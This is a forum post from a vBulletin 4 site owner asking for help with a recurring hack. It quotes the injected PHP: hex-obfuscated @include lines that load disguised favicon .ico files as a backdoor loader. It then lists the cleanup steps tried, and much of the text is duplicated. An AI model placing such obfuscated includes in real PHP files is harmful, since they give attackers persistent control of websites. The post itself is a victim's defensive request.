Some time ago, my vBulletin 4 site was hacked, and I didn't realize it until weeks later. Here are the symptoms:
1. All index.html files are renamed to index.html.bak.bak
2. A new index.php file is created with this content:
3. All index.php files are edited to include the following code:
I'm not even sure what the hack is actually doing, but it can't be good.
Steps I have taken:
1. Upgraded to the very latest version of vBulletin 4.2.4.
2. Upgraded to the very latest version of the Tapatalk plugin.
3. Removed all the inserted code.
4. Checked crontab to ensure nothing has been added.
5. Verified that I'm using the recommended security settings, such as a .host file, etc.
Unfortunately, it comes back on a daily basis. I haven't noticed if it comes back at a certain time, but it happens at least once a day, so I assume it's something automated.
I did a search for this issue, both on the vBulletin site and just a general web search, and I couldn't seem to find any reference (could be I didn't know what to search for).
Does anyone have any clues to point me in the right direction?
1. All index.html files are renamed to index.html.bak.bak
2. A new index.php file is created with this content:
Code:
<?php /*f7102*/ @include "\x2fh\x6fm\x65/\x6di\x63h\x61e\x6c/\x76f\x72w\x6fr\x6cd\x2ec\x6fm\x2fw\x77w\x2fh\x74m\x6c/\x66o\x72u\x6ds\x2fc\x6ci\x65n\x74s\x63r\x69p\x74/\x6ci\x67h\x74b\x6fx\x2ff\x61v\x69c\x6fn\x5fd\x337\x393\x39.\x69c\x6f"; /*f7102*/ echo file_get_contents('index.html.bak.bak');
Code:
/*2eb2a*/ @include "\x2fh\x6fm\x65/\x6di\x63h\x61e\x6c/\x76f\x72w\x6fr\x6cd\x2ec\x6fm\x2fw\x77w\x2fh\x74m\x6c/\x70h\x6ft\x6fs\x2fd\x61t\x61/\x356\x38/\x66a\x76i\x63o\x6e_\x614\x30d\x37f\x2ei\x63o"; /*2eb2a*/
Steps I have taken:
1. Upgraded to the very latest version of vBulletin 4.2.4.
2. Upgraded to the very latest version of the Tapatalk plugin.
3. Removed all the inserted code.
4. Checked crontab to ensure nothing has been added.
5. Verified that I'm using the recommended security settings, such as a .host file, etc.
Unfortunately, it comes back on a daily basis. I haven't noticed if it comes back at a certain time, but it happens at least once a day, so I assume it's something automated.
I did a search for this issue, both on the vBulletin site and just a general web search, and I couldn't seem to find any reference (could be I didn't know what to search for).
Does anyone have any clues to point me in the right direction?
Comment